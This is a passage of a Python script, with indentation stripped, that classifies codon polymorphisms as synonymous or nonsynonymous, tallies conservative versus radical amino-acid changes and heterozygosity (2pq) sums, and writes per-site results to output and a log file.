sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
